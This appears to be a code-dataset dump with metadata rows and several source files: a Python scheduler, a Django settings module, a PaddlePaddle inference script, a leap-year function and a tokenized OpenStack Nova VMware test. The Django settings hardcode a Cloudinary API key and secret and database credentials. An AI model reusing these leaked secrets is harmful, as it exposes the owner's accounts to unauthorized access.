blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9373c0cd05fa128d62a95b63054c5a5f5d3ec8dc | 97426aa614cd9e07d53dd761b55472389a3ebd60 | /python/scripts/marketsim/scheduler.py | e4bb7eb635eb6e453927fdca5173fbb21bee0838 | [] | no_license | antonkolotaev/v2 | e30a12ea710848838d85ee0b6bbd9224e40602d2 | db64cd78577cebb366d0b3d849fdfbe694b97f94 | refs/heads/master | 2020-12-24T14:35:59.486012 | 2012-08-16T08:24:13 | 2012-08-16T08:24:13 | 10,887,220 | 1 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | import heapq
class _EventHandler(object):
def __init__(self, handler):
self._handler = handler
self._cancelled = False
def __call__(self):
self._handler()
def cancel(self):
self._cancelled = True
@property
def cancelled(self):
return self._cancelled
def __repr__(self):
return "("+repr(self._handler) + ("-> Cancelled" if self.cancelled else "") + ")"
class Scheduler(object):
def __init__(self):
self.reset()
def reset(self):
self._elements = []
self._currentTime = 0.
def __repr__(self):
return "(t=" + str(self.currentTime) + ": " + repr(self._elements) + ")"
@property
def currentTime(self):
return self._currentTime
def schedule(self, actionTime, handler):
assert actionTime >= self.currentTime
eh = _EventHandler(handler)
event = (actionTime, eh)
heapq.heappush(self._elements, event)
return eh.cancel
def scheduleAfter(self, dt, handler):
self.schedule(self.currentTime + dt, handler)
def workTill(self, limitTime):
while (self._elements <> [] and self._elements[0][0] < limitTime):
(actionTime, eh) = heapq.heappop(self._elements)
if not eh.cancelled:
self._currentTime = actionTime
eh()
self._currentTime = limitTime
def advance(self, dt):
self.workTill(self.currentTime + dt)
def process(self, intervalFunc, handler):
def h():
handler()
self.scheduleAfter(intervalFunc(), h)
self.scheduleAfter(intervalFunc(), h)
world = Scheduler() | [
"[email protected]"
] | |
90e2fd31f15d3ba613a447de0e0f4bb4e370a085 | c67dc92dd0c4dc7661b9185ae7487abf086d4dc6 | /appraisalproject/settings.py | 4130eeb0d62b3e1e7b6a41d0a38d16ffe9f025bf | [
"MIT"
] | permissive | felkiriinya/Quality-Appraisal | 1f14339eddaad256994501ab2aa5e1a128b16478 | 5b9e114d96816a9d146eca7646330da7d273b6ef | refs/heads/master | 2023-01-22T22:31:30.052977 | 2020-12-09T14:13:41 | 2020-12-09T14:13:41 | 319,227,932 | 2 | 0 | MIT | 2020-12-08T18:46:21 | 2020-12-07T06:43:12 | HTML | UTF-8 | Python | false | false | 4,515 | py | """
Django settings for appraisalproject project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
import cloudinary
import cloudinary.api
import cloudinary.uploader
import django_heroku
import dj_database_url
from decouple import config,Csv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
MODE=config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
'HOST': config('DB_HOST'),
'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
'bootstrap3',
'appraisalapp.apps.AppraisalappConfig',
'cloudinary',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'appraisalproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'appraisalproject.wsgi.application'
cloudinary.config(
cloud_name = "duhceor4r",
api_key = "988552584751394",
api_secret = "grnCc_TFy5WFWteERzMJRj3t88k"
)
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'appraisal',
'USER': 'felista',
'PASSWORD':'ilovemyself',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
AUTH_PROFILE_MODULE = 'accounts.Profile'
LOGOUT_REDIRECT_URL='/logout/'
LOGIN_REDIRECT_URL='/'
django_heroku.settings(locals()) | [
"[email protected]"
] | |
dc8e427f0f9960b214b3229a6aad8301ef411940 | e6ab424564e3d651ca2533ad7078dcd9c677d3b1 | /tutorial-reference/Day 23/raw_input.py | 289f09e2cc0cd7a886a1a9068d76b1906f432bd2 | [
"MIT"
] | permissive | fineanmol/30-Days-of-Python | cd274c155d811a0d865dbe790f3d998626e45cae | e4b7b6272febf05ca7fc73652f141ca355e638f8 | refs/heads/master | 2022-10-16T07:07:14.889425 | 2022-10-01T21:47:33 | 2022-10-01T21:47:33 | 151,871,847 | 4 | 1 | MIT | 2022-10-01T21:47:34 | 2018-10-06T18:54:29 | HTML | UTF-8 | Python | false | false | 122 | py |
from getpass import getpass
name = input("What's your name?\n")
pw = getpass("What's your password?\n")
print(name, pw)
| [
"[email protected]"
] | |
f2f8d6a4696af48a294dd7a3760a76943e0fa51a | e3fe234510d19c120d56f9a2876b7d508d306212 | /16paddle/dssm_lm_rank/infer.py | 46aade009862bd1903c9ce6ade3cb0918b75bd60 | [
"Apache-2.0"
] | permissive | KEVINYZY/python-tutorial | 78b348fb2fa2eb1c8c55d016affb6a9534332997 | ae43536908eb8af56c34865f52a6e8644edc4fa3 | refs/heads/master | 2020-03-30T02:11:03.394073 | 2019-12-03T00:52:10 | 2019-12-03T00:52:10 | 150,617,875 | 0 | 0 | Apache-2.0 | 2018-09-27T16:39:29 | 2018-09-27T16:39:28 | null | UTF-8 | Python | false | false | 2,827 | py | # -*- coding: utf-8 -*-
# Author: XuMing <[email protected]>
# Data: 17/10/18
# Brief: 预测
import os
import sys
import paddle.v2 as paddle
import config
import reader
from network import dssm_lm
from utils import logger, load_dict, load_reverse_dict
def infer(model_path, dic_path, infer_path, prediction_output_path, rnn_type="gru", batch_size=1):
logger.info("begin to predict...")
# check files
assert os.path.exists(model_path), "trained model not exits."
assert os.path.exists(dic_path), " word dictionary file not exist."
assert os.path.exists(infer_path), "infer file not exist."
logger.info("load word dictionary.")
word_dict = load_dict(dic_path)
word_reverse_dict = load_reverse_dict(dic_path)
logger.info("dictionary size = %d" % (len(word_dict)))
try:
word_dict["<unk>"]
except KeyError:
logger.fatal("the word dictionary must contain <unk> token.")
sys.exit(-1)
# initialize PaddlePaddle
paddle.init(use_gpu=config.use_gpu, trainer_count=config.num_workers)
# load parameter
logger.info("load model parameters from %s " % model_path)
parameters = paddle.parameters.Parameters.from_tar(
open(model_path, "r"))
# load the trained model
prediction = dssm_lm(
vocab_sizes=[len(word_dict), len(word_dict)],
emb_dim=config.emb_dim,
hidden_size=config.hidden_size,
stacked_rnn_num=config.stacked_rnn_num,
rnn_type=rnn_type,
share_semantic_generator=config.share_semantic_generator,
share_embed=config.share_embed,
is_infer=True)
inferer = paddle.inference.Inference(
output_layer=prediction, parameters=parameters)
feeding = {"left_input": 0, "left_target": 1, "right_input": 2, "right_target": 3}
logger.info("infer data...")
# define reader
reader_args = {
"file_path": infer_path,
"word_dict": word_dict,
"is_infer": True,
}
infer_reader = paddle.batch(reader.rnn_reader(**reader_args), batch_size=batch_size)
logger.warning("output prediction to %s" % prediction_output_path)
with open(prediction_output_path, "w")as f:
for id, item in enumerate(infer_reader()):
left_text = " ".join([word_reverse_dict[id] for id in item[0][0]])
right_text = " ".join([word_reverse_dict[id] for id in item[0][2]])
probs = inferer.infer(input=item, field=["value"], feeding=feeding)
f.write("%f\t%f\t%s\t%s" % (probs[0], probs[1], left_text, right_text))
f.write("\n")
if __name__ == "__main__":
infer(model_path=config.model_path,
dic_path=config.dic_path,
infer_path=config.infer_path,
prediction_output_path=config.prediction_output_path,
rnn_type=config.rnn_type)
| [
"[email protected]"
] | |
84af5643294405a7ff2847ab15b144cbe2e0b180 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/54a77e4df04741779d39c341ac4e009d.py | 3f2016251f8855d98df3f0166caff580674caeeb | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 90 | py | def is_leap_year(year):
return bool((not year % 4 and year % 100) or not year % 400)
| [
"[email protected]"
] | |
6f115c7096d8ae1c99f1016d22ed8d128fa46b32 | 75d8667735782cd1d0eb4877e52c89da5cd92dde | /nova/tests/unit/virt/vmwareapi/test_vif.py | 5b4fb19c12b3b518d45107c750fd29f41ecc21e7 | [
"Apache-2.0"
] | permissive | bopopescu/nova-token | ffecfd3ec561936b7d9d7e691bc57383cde05436 | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | refs/heads/master | 2022-11-22T09:53:31.073483 | 2016-05-14T02:47:01 | 2016-05-15T22:02:55 | 282,105,621 | 0 | 0 | Apache-2.0 | 2020-07-24T02:42:19 | 2020-07-24T02:42:18 | null | UTF-8 | Python | false | false | 31,662 | py | begin_unit
comment|'# Copyright 2013 Canonical Corp.'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'vim_util'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'network'
name|'import'
name|'model'
name|'as'
name|'network_model'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'matchers'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'utils'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'constants'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'network_util'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vif'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vm_util'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|VMwareVifTestCase
name|'class'
name|'VMwareVifTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVifTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vlan_interface'
op|'='
string|"'vmnet0'"
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'network'
op|'='
name|'network_model'
op|'.'
name|'Network'
op|'('
name|'id'
op|'='
number|'0'
op|','
nl|'\n'
name|'bridge'
op|'='
string|"'fa0'"
op|','
nl|'\n'
name|'label'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'vlan'
op|'='
number|'3'
op|','
nl|'\n'
name|'bridge_interface'
op|'='
string|"'eth0'"
op|','
nl|'\n'
name|'injected'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_network'
op|'='
name|'network'
newline|'\n'
name|'self'
op|'.'
name|'vif'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'id'
op|'='
name|'None'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'network'
op|','
nl|'\n'
name|'type'
op|'='
name|'None'
op|','
nl|'\n'
name|'devname'
op|'='
name|'None'
op|','
nl|'\n'
name|'ovs_interfaceid'
op|'='
name|'None'
op|','
nl|'\n'
name|'rxtx_cap'
op|'='
number|'3'
op|')'
nl|'\n'
op|']'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'cluster'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVifTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_ensure_vlan_bridge
dedent|''
name|'def'
name|'test_ensure_vlan_bridge'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'None'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_vswitch_for_vlan_interface'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
string|"'vmnet0'"
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'check_if_vlan_interface_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'True'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'create_port_group'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
string|"'vmnet0'"
op|','
number|'3'
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'create_vlan'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
comment|"# FlatDHCP network mode without vlan - network doesn't exist with the host"
nl|'\n'
DECL|member|test_ensure_vlan_bridge_without_vlan
dedent|''
name|'def'
name|'test_ensure_vlan_bridge_without_vlan'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
nl|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'None'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_vswitch_for_vlan_interface'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
string|"'vmnet0'"
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'check_if_vlan_interface_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'True'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'create_port_group'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
string|"'vmnet0'"
op|','
number|'0'
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
comment|'# FlatDHCP network mode without vlan - network exists with the host'
nl|'\n'
comment|'# Get vswitch and check vlan interface should not be called'
nl|'\n'
DECL|member|test_ensure_vlan_bridge_with_network
dedent|''
name|'def'
name|'test_ensure_vlan_bridge_with_network'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
name|'vm_network'
op|'='
op|'{'
string|"'name'"
op|':'
string|"'VM Network'"
op|','
string|"'type'"
op|':'
string|"'Network'"
op|'}'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'vm_network'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
comment|'# Flat network mode with DVS'
nl|'\n'
DECL|member|test_ensure_vlan_bridge_with_existing_dvs
dedent|''
name|'def'
name|'test_ensure_vlan_bridge_with_existing_dvs'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_ref'
op|'='
op|'{'
string|"'dvpg'"
op|':'
string|"'dvportgroup-2062'"
op|','
nl|'\n'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
nl|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'network_ref'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
name|'self'
op|'.'
name|'vif'
op|','
nl|'\n'
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertThat'
op|'('
name|'ref'
op|','
name|'matchers'
op|'.'
name|'DictMatches'
op|'('
name|'network_ref'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_ref_flat_dhcp
dedent|''
name|'def'
name|'test_get_network_ref_flat_dhcp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vif'
op|','
string|"'ensure_vlan_bridge'"
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'cluster'
op|'='
name|'self'
op|'.'
name|'cluster'
op|','
nl|'\n'
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'get_network_ref'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'cluster'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_ref_bridge
dedent|''
name|'def'
name|'test_get_network_ref_bridge'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vif'
op|','
string|"'ensure_vlan_bridge'"
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'cluster'
op|'='
name|'self'
op|'.'
name|'cluster'
op|','
nl|'\n'
name|'create_vlan'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'network'
op|'='
name|'network_model'
op|'.'
name|'Network'
op|'('
name|'id'
op|'='
number|'0'
op|','
nl|'\n'
name|'bridge'
op|'='
string|"'fa0'"
op|','
nl|'\n'
name|'label'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'vlan'
op|'='
number|'3'
op|','
nl|'\n'
name|'bridge_interface'
op|'='
string|"'eth0'"
op|','
nl|'\n'
name|'injected'
op|'='
name|'True'
op|','
nl|'\n'
name|'should_create_vlan'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'vif'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'id'
op|'='
name|'None'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'network'
op|','
nl|'\n'
name|'type'
op|'='
name|'None'
op|','
nl|'\n'
name|'devname'
op|'='
name|'None'
op|','
nl|'\n'
name|'ovs_interfaceid'
op|'='
name|'None'
op|','
nl|'\n'
name|'rxtx_cap'
op|'='
number|'3'
op|')'
nl|'\n'
op|']'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'vif'
op|'.'
name|'get_network_ref'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'cluster'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'False'
op|')'
